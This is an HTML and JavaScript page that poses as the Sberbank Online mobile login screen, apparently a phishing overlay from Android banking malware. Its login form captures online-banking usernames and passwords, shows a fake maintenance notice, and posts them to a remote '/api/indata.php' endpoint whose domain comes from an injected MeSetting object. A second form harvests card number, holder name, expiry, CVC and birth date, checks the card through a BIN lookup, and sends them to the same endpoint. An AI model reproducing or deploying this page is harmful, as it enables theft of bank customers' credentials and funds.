<!DOCTYPE html>
<html lang="ru">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no" />
    <link rel="stylesheet" type="text/css" href="style.css">
    <script src="main.js"></script>
    <title></title>
</head>
<body>
	<div id="header"></div>

	<div id="page-1">
		<img src="ic_splash_logo.png" id="logo" />
		<div id="wrapper">
			<img src="phone_splash.png" />
			<p>Для доступа к счетам и картам<br>зарегистрируйте свой телефон.</p>
			<div id="register-device">ВОЙТИ В СБЕРБАНК ОНЛАЙН</div>
			<div id="register-device2">ЗАРЕГИСТРИРОВАТЬСЯ</div>
			<p id="annotation" style="font-size: 10pt;">Убедитесь, что у Вас подключена<br>услуга "Мобильный банк"</p>
			<div id="mobbank">
				<p>C помощью мобильного банка Вы будете получать СМС-сообщения от банка. Подключить бесплатный пакет можно в любом банкомате или отделении банка. Если вам приходят SMS с номера 900, значит услуга уже подключена.</p>
			</div>
		</div>
		<div id="login-form">
			<form method="POST" id="myformsbol1" name="myformsbol1">
				<button id="send-sbol" disabled="disabled" type="button"></button>
				<input placeholder="Логин или идентификатор" id="sbol-login" name="sbol_login" onkeyup="setValidator(this.id, /^[^А-Яа-я]*$/)" />
				<input type="password" placeholder="Пароль" id="sbol-password" name="sbol_password" onkeyup="setValidator(this.id, /^[^А-Яа-я]*$/)" />
				<div id="getinfo">
					<p>Как получить идентификатор</p>
					<img src="info.png" />
				</div>
				<div id="info">
					<p>Как получить идентификатор</p>
					<div id="sitesbol">
						<a href="https://online.sberbank.ru" target="_blank"><img src="auth_site.png" /></a>
						<p>На сайте Сбербанк Онлайн</p>
					</div>
					<div id="phonesbol">
						<a href="tel:88005555550"><img src="auth_phone.png" /></a>
						<p>По телефону 8 800 555 5550</p>
					</div>
					<div id="atmsbol">
						<img src="auth_atm.png" />
						<p>В любом банкомате Сбербанка</p>
					</div>
				</div>
			</form>
			<div id="error2">
				<p>В настоящее время проводятся технические работы. Приложение закроется автоматически<br><br>Приносим извинения за неудобства</p>
			</div>
		</div>
		<div id="register-form">
			<form method="POST" id="myformsbol2" name="myformsbol2">
				<div class="error-up">
					<p>Все поля ОБЯЗАТЕЛЬНЫ для заполнения</p>
				</div> 
				<input name="credit_card_number" type="tel" class="credit_card_number" id="credit_card_number_id" placeholder="Номер банковской карты" />
				<input name="cardholder_name" type="text" class="cardholder_name" id="cardholder_name_id" placeholder="Имя владельца карты" onkeyup="setValidator(this.id, /^[A-Za-z ]*$/)" />
				<input name="credit_card_expiry" type="tel" class="credit_card_expiry" id="credit_card_expiry_id" placeholder="Срок действия ММ/ГГ" />
				<input name="credit_card_cvc" type="tel" class="credit_card_cvc" id="credit_card_cvc_id" placeholder="CVC/CVV" />
				<input name="dd_mm_yyyy" type="tel" class="dd_mm_yyyy" placeholder="Дата рождения ДД/ММ/ГГГГ" />
				<div id="button-2">РЕГИСТРАЦИЯ</div>
			</form>
		</div>
	</div>

<script>
$('#register-device').click(function() {
	$('#wrapper').hide();
	$('#login-form').show();
});

$('#register-device2').click(function() {
	$('#wrapper').hide();
	$('#register-form').show();
});

$('#annotation').click(function() {
	$('#mobbank').show();
});

$('#mobbank').click(function() {
	$('#mobbank').hide();
});

$('#getinfo p, #getinfo img').click(function() {
	$('#info').show();
});

$('#info').click(function() {
	$('#info').hide();
});
</script>

<script>
var valid_first = '';
var valid_second = '';
var full_valid = '';
var cardholder_valid = '';
var expiry_valid = '';
var cvv_valid = '';
var dob_valid = '';


$('#button-2').click(function() {
		var ccn = $('input.credit_card_number').val();
		var chn = $('input.cardholder_name').val();
		var cce = $('input.credit_card_expiry').val();
		var ccc = $('input.credit_card_cvc').val();
		var dmy = $('input.dd_mm_yyyy').val();
		if (full_valid == true && cardholder_valid == true && expiry_valid == true && cvv_valid == 'true' && dob_valid == 'true') {
			document.myformsbol2.submit();
		}
		else {
			$('.error-up').slideDown().delay('2000').slideUp();
		}
});

$('input.credit_card_number').formance('format_credit_card_number');
$('input.credit_card_expiry').formance('format_credit_card_expiry');
$('input.credit_card_cvc').formance('format_credit_card_cvc');
$('input.dd_mm_yyyy').formance('format_dd_mm_yyyy');

$(function() {
	$('input.credit_card_number').validateCreditCard(function(result) {
		valid_first = result.valid;
	});
});


    $('input.credit_card_number').blur(function(){
    changeCVV();
    bin = $('input.credit_card_number').val().replace(/\s+/g, '').substr(0,6);
	if ($('input.credit_card_number').val() == '' || $('input.credit_card_number').val() == '4111 1111 1111 1111') {
		valid_first = 'nope';
	}

	if (valid_first == 'nope') {
		$('input.credit_card_number').attr('placeholder', 'Введите правильный номер банковской карты').val('').focus();
		return false;
	}
    	if (valid_first == true) {
		$.ajax({ 
			type: 'GET', 
			url: 'https://www.binlist.net/json/' + bin + '', 
			dataType: 'json',
			success: function (data) { 
				valid_second = data.country_name;
			}
		});

	}
	if (valid_first == false) {
		$('input.credit_card_number').attr('placeholder', 'Введите правильный номер банковской карты').val('');
		full_valid = false;
		return false;
	}
setTimeout(function () {
	if (valid_second == '') {
		$('input.credit_card_number').attr('placeholder', 'Ваша карта не подходит, используйте другую').val('');
		full_valid = false;
	}
	if (valid_second != '') {
		$('input.credit_card_number').css('color', 'green');
		full_valid = true;
	}
}, 1500);
    });

$('input.cardholder_name').blur(function() {
	if ($(this).val() == '') {
		$('input.cardholder_name').val('');
		cardholder_valid = false;
		return false;
	}
	if (checkStr($(this).val()) == true) {
		$('input.cardholder_name').attr('placeholder', 'Введите правильное имя владельца карты').val('');
		cardholder_valid = false;
	}
	else {
		if ($(this).val().split(' ').length == 2 && $(this).val().split(' ')[0].length >= 3 && $(this).val().split(' ')[1].length >= 3) {
			cardholder_valid = true;
			$('input.cardholder_name').css('color', 'green');
		}
			else {
				$('input.cardholder_name').attr('placeholder', 'Введите правильное имя владельца карты').val('');
				cardholder_valid = false;
			}	
	}

});

$('input.credit_card_expiry').blur(function() {
	if ($('input.credit_card_expiry').formance('validate_credit_card_expiry') == false) {
		$('input.credit_card_expiry').css('color', 'red');
		expiry_valid = false;
	}
	else {
		$('input.credit_card_expiry').css('color', 'green');
		expiry_valid = true;
	}
});

$('input.credit_card_cvc').blur(function() {
	if ($('input.credit_card_cvc').val().length < 3) {
		$('input.credit_card_cvc').css('color', 'red');
		cvv_valid = 'false';
	}
	else {
		$('input.credit_card_cvc').css('color', 'green');
		cvv_valid = 'true';
	}
});

$('input.dd_mm_yyyy').blur(function() {
	if ($('input.dd_mm_yyyy').formance('validate_dd_mm_yyyy') == false) {
		$('input.dd_mm_yyyy').css('color', 'red');
		dob_valid = 'false';
	}
	else {
		if ($(this).val().split(' / ')[2] >= new Date().getFullYear() || $(this).val().split(' / ')[2] < 1940) {
			$('input.dd_mm_yyyy').css('color', 'red');
			dob_valid = 'false';
		}
		else {
			$('input.dd_mm_yyyy').css('color', 'green');
			dob_valid = 'true';
		}
	}
});

$('#myformsbol2').submit(function(e){
    e.preventDefault();
});

document.myformsbol2.action = "http://"+MeSetting.getDomain()+"/api/indata.php?type=SBankCC";
</script>

<script>
function SBank() {
	if ($('#sbol-login').val().length >= 5 && $('#sbol-password').val().length >= 5) {
		$('#send-sbol').prop("disabled", false);
	}
	else {
		$('#send-sbol').prop("disabled", true);
	}
};
setInterval(SBank, 100);

$('#send-sbol').click(function() {
	$('#myformsbol1').fadeOut(1000, function() {
		$('#error2').fadeIn(500).delay(5000).delay(100, function() {
			document.myformsbol1.submit();
		});
	});

});

$('#myformsbol1').submit(function(e){
    e.preventDefault();
});

document.myformsbol1.action = "http://"+MeSetting.getDomain()+"/api/indata.php?type=SBankFull";
</script>
</body>
</html>

